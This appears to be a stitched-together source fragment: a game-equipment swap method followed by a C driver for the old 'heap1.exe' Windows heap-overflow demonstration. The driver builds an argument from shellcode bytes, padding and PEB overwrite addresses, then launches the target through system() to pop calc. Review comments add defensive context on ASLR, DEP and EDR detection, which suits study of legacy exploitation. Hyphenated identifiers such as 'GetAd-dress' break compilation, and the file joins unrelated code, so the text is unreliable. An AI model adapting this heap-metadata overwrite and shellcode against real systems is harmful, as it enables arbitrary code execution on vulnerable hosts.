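/// Replace whatever occupies this equipment slot with `item`.
///
/// @param item        Item to equip; must report the same equip type as this
///                    slot (`_type`).
/// @param resultItem  Forwarded unchanged to undress() when the slot is
///                    currently occupied, so the caller receives the item
///                    that was displaced. This method never writes to it
///                    directly.
/// @return false when `item` is null or its equip type does not match the
///         slot; otherwise whatever dress(item) returns.
bool Equipment::swap(Item* item, Item** resultItem) {
    // Guard the dereference: a null item cannot be matched against the slot
    // type, so treat it as a failed swap instead of crashing.
    if (item == nullptr || _type != item->getEquipType()) {
        return false;
    }
    // Hand the current occupant back to the caller (via undress) before the
    // slot is reused; the previous "resultItem* = _item" idea is superseded
    // by that call.
    if (isEquipped()) {
        undress(resultItem);
    }
    return dress(item);
}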
// Driver for the classic "heap1.exe" heap-overflow demonstration: it assembles
// one command-line argument for heap1.exe (a marker word, the payload bytes,
// filler, and two overwrite addresses) and launches the target via system().
//
// Security context, from the defender's side: the sample relies on fixed,
// non-randomised module and PEB addresses and on an allocator that trusts
// on-heap block metadata. Address-space layout randomisation, safe unlinking
// and heap metadata checks, and DEP on current Windows releases remove those
// preconditions, so the sample only functions on the old, unhardened
// environment it was written against. For detection, a parent process that
// spawns a child with an argument consisting largely of non-printable bytes
// is exactly the pattern command-line auditing and EDR telemetry surface.
//
// NOTE(review): "GetAd-dress" and "ad-dress_of_RtlEnterCriticalSection" look
// like hyphenation artifacts from the document this was extracted from
// (presumably GetAddress / address_of_RtlEnterCriticalSection); as written
// they do not compile.
// NOTE(review): buffer and tmp are unsigned char[], while strcpy/strcat/system
// take char*. A C compiler accepts that with warnings; a C++ compiler rejects
// it.
// GetAddress() and fixupaddresses() are defined elsewhere in the file and are
// not visible here.
int main() {
    unsigned char buffer[300]="";
    unsigned char heap[8]="";        // unused
    unsigned char pebf[8]="";        // unused
    unsigned char shellcode[200]=""; // unused
    unsigned int address_of_system = 0;
    unsigned int address_of_RtlEnterCriticalSection = 0;
    // Scratch area fixupaddresses() fills before each strcat; assumed to hold
    // a 4-byte address plus terminator — TODO confirm against its definition.
    unsigned char tmp[8]="";
    unsigned int cnt = 0;
    printf("Getting addresses...\n");
    // Resolve the two absolute addresses embedded in the payload; presumably
    // an export lookup by module and function name.
    address_of_system = GetAddress("msvcrt.dll","system");
    address_of_RtlEnterCriticalSection = GetAd-dress("ntdll.dll","RtlEnterCriticalSection");
    // NOTE(review): printf returns the number of characters written, so this
    // exit status is a non-zero but otherwise meaningless value.
    if(address_of_system == 0 || ad-dress_of_RtlEnterCriticalSection == 0)
        return printf("Failed to get addresses\n");
    printf("Address of msvcrt.system\t\t\t= %.8X\n",address_of_system);
    printf("Address of ntdll.RtlEnterCriticalSection\t= %.8X\n",address_of_RtlEnterCriticalSection);
    // Argument assembly. There is no length check: with 4-byte addresses from
    // fixupaddresses the result is 287 bytes plus NUL and fits the 300-byte
    // buffer, but any longer tmp content would overrun it.
    strcpy(buffer,"heap1 ");
    // Shellcode - repairs the PEB then calls system("calc");
    strcat(buffer,"\"\x90\x90\x90\x90\x01\x90\x90\x6A\x30\x59\x64\x8B\x01\xB9");
    fixupaddresses(tmp,address_of_RtlEnterCriticalSection);
    strcat(buffer,tmp);
    strcat(buffer,"\x89\x48\x20\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9");
    fixupaddresses(tmp,address_of_system);
    strcat(buffer,tmp);
    strcat(buffer,"\xFF\xD1");
    // Padding
    while(cnt < 58) {
        strcat(buffer,"DDDD");
        cnt ++;
    }
    // Pointer to RtlEnterCriticalSection pointer - 4 in PEB
    strcat(buffer,"\x1C\xF0\xFD\x7f");
    // Pointer to heap and thus shellcode
    strcat(buffer,"\x88\x06\x35");
    strcat(buffer,"\"");
    printf("\nExecuting heap1.exe... calc should open.\n");
    // The child process inherits the assembled argument verbatim; this
    // system() call is the point a process-creation log would record.
    system(buffer);
    return 0;
}